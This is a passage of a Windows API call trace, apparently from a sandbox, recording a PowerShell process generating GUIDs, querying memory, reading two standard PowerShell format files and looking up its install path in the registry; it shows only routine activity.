	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x7814556f, Data2=0xbdf, Data3=0x42a5, Data4=([0]=0xb6, [1]=0x53, [2]=0x67, [3]=0x55, [4]=0x51, [5]=0x3b, [6]=0xf8, [7]=0x0))) returned 0x0
	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4a7c519c, Data2=0x5bc1, Data3=0x4eb4, Data4=([0]=0xbb, [1]=0xf3, [2]=0x57, [3]=0x13, [4]=0x28, [5]=0xfb, [6]=0x21, [7]=0x9f))) returned 0x0
	[0343.183] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xebd08f81, Data2=0xd9a4, Data3=0x4aa9, Data4=([0]=0xbf, [1]=0xb4, [2]=0x85, [3]=0x94, [4]=0x9b, [5]=0x8a, [6]=0x26, [7]=0x33))) returned 0x0
	[0343.184] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x37afa52e, Data2=0xfe70, Data3=0x4e58, Data4=([0]=0xb7, [1]=0xab, [2]=0xca, [3]=0xa, [4]=0xa, [5]=0xea, [6]=0x9c, [7]=0x60))) returned 0x0
	[0343.184] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xab928afc, Data2=0xbf21, Data3=0x451f, Data4=([0]=0x80, [1]=0x10, [2]=0x45, [3]=0x84, [4]=0x68, [5]=0x5b, [6]=0xc9, [7]=0xd2))) returned 0x0
	[0343.184] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x35349668, Data2=0x79cf, Data3=0x4f10, Data4=([0]=0xb6, [1]=0xe9, [2]=0x82, [3]=0x92, [4]=0x9, [5]=0xf1, [6]=0x1c, [7]=0x8f))) returned 0x0
	[0343.184] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6a273052, Data2=0x1383, Data3=0x4b73, Data4=([0]=0x8c, [1]=0x34, [2]=0x2c, [3]=0xe1, [4]=0x56, [5]=0xc8, [6]=0xd9, [7]=0x7))) returned 0x0
	[0343.184] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x1b0cb0ca, Data2=0xae65, Data3=0x4856, Data4=([0]=0xa4, [1]=0x39, [2]=0x3e, [3]=0xac, [4]=0x42, [5]=0x3d, [6]=0x84, [7]=0xdc))) returned 0x0
	[0343.184] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.184] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.185] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.185] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x79c3e0d8, Data2=0xa40f, Data3=0x43ca, Data4=([0]=0xb2, [1]=0xb0, [2]=0x79, [3]=0x7a, [4]=0x74, [5]=0xa4, [6]=0x2f, [7]=0xdb))) returned 0x0
	[0343.185] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf937c3bd, Data2=0xbe7f, Data3=0x48b6, Data4=([0]=0xad, [1]=0xfb, [2]=0xa, [3]=0xe0, [4]=0xd2, [5]=0xc3, [6]=0x9a, [7]=0xf7))) returned 0x0
	[0343.185] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x905cec, Data2=0xf231, Data3=0x4c46, Data4=([0]=0xa6, [1]=0x8f, [2]=0xde, [3]=0xfd, [4]=0x7, [5]=0xf0, [6]=0x97, [7]=0x74))) returned 0x0
	[0343.185] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xa6e26f25, Data2=0x336f, Data3=0x4410, Data4=([0]=0xbc, [1]=0x5c, [2]=0xb4, [3]=0x40, [4]=0x32, [5]=0x58, [6]=0x17, [7]=0xa0))) returned 0x0
	[0343.185] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x29cfa0f9, Data2=0x638c, Data3=0x481e, Data4=([0]=0x95, [1]=0x8, [2]=0xe, [3]=0x0, [4]=0xbd, [5]=0xb3, [6]=0x8a, [7]=0xb9))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb73a7684, Data2=0x8b93, Data3=0x417d, Data4=([0]=0xbc, [1]=0xb6, [2]=0xd3, [3]=0xba, [4]=0x20, [5]=0x60, [6]=0x5f, [7]=0x90))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x99971331, Data2=0x2860, Data3=0x4783, Data4=([0]=0xa7, [1]=0x38, [2]=0xa, [3]=0xad, [4]=0x72, [5]=0x23, [6]=0x16, [7]=0x45))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xe24c3acc, Data2=0xb3e4, Data3=0x42e2, Data4=([0]=0xab, [1]=0x6e, [2]=0x64, [3]=0x7a, [4]=0x4f, [5]=0x8a, [6]=0x73, [7]=0xf))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3fd06297, Data2=0xe3cb, Data3=0x49f4, Data4=([0]=0x83, [1]=0x57, [2]=0x2a, [3]=0x4b, [4]=0xb2, [5]=0x20, [6]=0xe1, [7]=0x5f))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xe8275f91, Data2=0xe55e, Data3=0x429a, Data4=([0]=0x9c, [1]=0x91, [2]=0xfe, [3]=0x46, [4]=0xdc, [5]=0x1, [6]=0x1f, [7]=0xb6))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xe1608f, Data2=0x42b0, Data3=0x4eba, Data4=([0]=0xa3, [1]=0x1, [2]=0x4, [3]=0x7d, [4]=0x1f, [5]=0xc5, [6]=0x9e, [7]=0xeb))) returned 0x0
	[0343.186] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xdce97da6, Data2=0x6ff9, Data3=0x4b7d, Data4=([0]=0x83, [1]=0xab, [2]=0x3c, [3]=0xb0, [4]=0xbd, [5]=0x88, [6]=0xa0, [7]=0xfa))) returned 0x0
	[0343.187] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3fb844, Data2=0x277, Data3=0x443a, Data4=([0]=0xa3, [1]=0xa1, [2]=0xdc, [3]=0x82, [4]=0x5f, [5]=0x5f, [6]=0x9b, [7]=0xc5))) returned 0x0
	[0343.187] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.187] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6ed11a7d, Data2=0xcd94, Data3=0x4f98, Data4=([0]=0xa6, [1]=0xa8, [2]=0x2e, [3]=0xdc, [4]=0xc1, [5]=0x74, [6]=0x87, [7]=0xd))) returned 0x0
	[0343.187] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.429] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.429] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x8aed13dd, Data2=0xe262, Data3=0x44c8, Data4=([0]=0x92, [1]=0xb, [2]=0xf2, [3]=0x81, [4]=0x6c, [5]=0x77, [6]=0x2a, [7]=0x1c))) returned 0x0
	[0343.430] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.430] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3d64fc9d, Data2=0xb2ef, Data3=0x425c, Data4=([0]=0xac, [1]=0x39, [2]=0xd, [3]=0x27, [4]=0x97, [5]=0x33, [6]=0x34, [7]=0xb))) returned 0x0
	[0343.430] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x7f8f6056, Data2=0x7f12, Data3=0x48a5, Data4=([0]=0x92, [1]=0xba, [2]=0xae, [3]=0x69, [4]=0xe2, [5]=0x8a, [6]=0x57, [7]=0xf))) returned 0x0
	[0343.430] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xac0a8beb, Data2=0x3c9, Data3=0x40bc, Data4=([0]=0x94, [1]=0x46, [2]=0xf2, [3]=0x3, [4]=0x2e, [5]=0x29, [6]=0x2e, [7]=0x8e))) returned 0x0
	[0343.430] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x59d88b8c, Data2=0xfbcc, Data3=0x4093, Data4=([0]=0xaf, [1]=0xf, [2]=0x19, [3]=0xbe, [4]=0x7b, [5]=0x1a, [6]=0x42, [7]=0x27))) returned 0x0
	[0343.431] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x69d31f9e, Data2=0xd345, Data3=0x4355, Data4=([0]=0xa7, [1]=0x7c, [2]=0x4, [3]=0x8c, [4]=0xf7, [5]=0x31, [6]=0x4b, [7]=0x93))) returned 0x0
	[0343.431] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x54a40f2, Data2=0x24ab, Data3=0x4747, Data4=([0]=0x8e, [1]=0xfb, [2]=0x5, [3]=0x52, [4]=0x97, [5]=0xc0, [6]=0x90, [7]=0x26))) returned 0x0
	[0343.431] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x88f685e9, Data2=0x1a2f, Data3=0x493d, Data4=([0]=0xa8, [1]=0x96, [2]=0x2d, [3]=0xc7, [4]=0xa6, [5]=0x41, [6]=0x35, [7]=0x9f))) returned 0x0
	[0343.431] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.431] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x5c2bca64, Data2=0xd6e9, Data3=0x4bb8, Data4=([0]=0x9d, [1]=0xe0, [2]=0x9f, [3]=0x8d, [4]=0xc9, [5]=0xc0, [6]=0x11, [7]=0xf6))) returned 0x0
	[0343.431] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf2ccf8a3, Data2=0xef47, Data3=0x4912, Data4=([0]=0x9d, [1]=0x3, [2]=0xaa, [3]=0x11, [4]=0x9e, [5]=0xec, [6]=0x3, [7]=0x78))) returned 0x0
	[0343.432] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xdedd2e16, Data2=0x28f2, Data3=0x4dfd, Data4=([0]=0xb5, [1]=0x1c, [2]=0xba, [3]=0x5, [4]=0xbf, [5]=0x52, [6]=0x6c, [7]=0x32))) returned 0x0
	[0343.432] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x5b46f2c5, Data2=0x5376, Data3=0x4771, Data4=([0]=0x82, [1]=0x8c, [2]=0x1a, [3]=0x94, [4]=0x60, [5]=0x69, [6]=0xe8, [7]=0x89))) returned 0x0
	[0343.432] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x24654272, Data2=0x8478, Data3=0x4617, Data4=([0]=0xb5, [1]=0xe7, [2]=0x50, [3]=0x1a, [4]=0x48, [5]=0xb1, [6]=0x38, [7]=0x48))) returned 0x0
	[0343.432] VirtualQuery (in: lpAddress=0x1aba20, lpBuffer=0x1ac8e0, dwLength=0x30 | out: lpBuffer=0x1ac8e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.432] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3d5f5d01, Data2=0x341c, Data3=0x4442, Data4=([0]=0xa4, [1]=0x1b, [2]=0x37, [3]=0x79, [4]=0xca, [5]=0xca, [6]=0xfb, [7]=0xcb))) returned 0x0
	[0343.432] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xa59b874a, Data2=0x6114, Data3=0x44af, Data4=([0]=0xa8, [1]=0xba, [2]=0xd7, [3]=0xf7, [4]=0x2e, [5]=0x99, [6]=0xeb, [7]=0x6c))) returned 0x0
	[0343.433] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.433] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.433] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.433] VirtualQuery (in: lpAddress=0x1aba90, lpBuffer=0x1ac950, dwLength=0x30 | out: lpBuffer=0x1ac950*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0343.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0343.433] SetErrorMode (uMode=0x1) returned 0x1
	[0343.434] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0343.434] GetFileType (hFile=0x2d0) returned 0x1
	[0343.434] SetErrorMode (uMode=0x1) returned 0x1
	[0343.434] GetFileType (hFile=0x2d0) returned 0x1
	[0343.434] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.435] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.435] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.435] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.435] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0343.436] ReadFile (in: hFile=0x2d0, lpBuffer=0x3173584, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3173584*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.436] ReadFile (in: hFile=0x2d0, lpBuffer=0x3174168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x3174168*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0343.436] SetErrorMode (uMode=0x1) returned 0x1
	[0343.436] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0343.436] SetErrorMode (uMode=0x1) returned 0x1
	[0343.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0343.436] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2d0) returned 0x0
	[0343.437] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0343.437] CoTaskMemAlloc (cb=0x5a) returned 0x1b8140b0
	[0343.437] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8140b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0343.437] CoTaskMemFree (pv=0x1b8140b0) 
	[0343.437] RegCloseKey (hKey=0x2d0) returned 0x0
	[0343.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0343.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0343.438] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x485db28e, Data2=0xad54, Data3=0x42b8, Data4=([0]=0x8a, [1]=0xd9, [2]=0xa4, [3]=0xec, [4]=0xef, [5]=0x7d, [6]=0xb6, [7]=0xf5))) returned 0x0
	[0343.438] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3d310288, Data2=0xf8d2, Data3=0x4019, Data4=([0]=0xa1, [1]=0xcb, [2]=0x86, [3]=0xbf, [4]=0xe, [5]=0xd2, [6]=0x7b, [7]=0x4b))) returned 0x0
	[0343.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0343.438] SetErrorMode (uMode=0x1) returned 0x1
	[0343.438] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0343.438] GetFileType (hFile=0x2d0) returned 0x1
	[0343.439] SetErrorMode (uMode=0x1) returned 0x1
	[0343.439] GetFileType (hFile=0x2d0) returned 0x1
	[0343.439] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0343.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0xe98, lpOverlapped=0x0) returned 1
	[0343.440] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1550, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1550*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.441] ReadFile (in: hFile=0x2d0, lpBuffer=0x31b1f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x31b1f50*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0343.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0343.441] SetErrorMode (uMode=0x1) returned 0x1
	[0343.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0343.441] SetErrorMode (uMode=0x1) returned 0x1
	[0343.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0343.441] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2d0) returned 0x0
	[0343.442] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0343.442] CoTaskMemAlloc (cb=0x5a) returned 0x1b8140b0
	[0343.442] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8140b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0343.442] CoTaskMemFree (pv=0x1b8140b0) 
	[0343.442] RegCloseKey (hKey=0x2d0) returned 0x0
	[0343.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0343.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
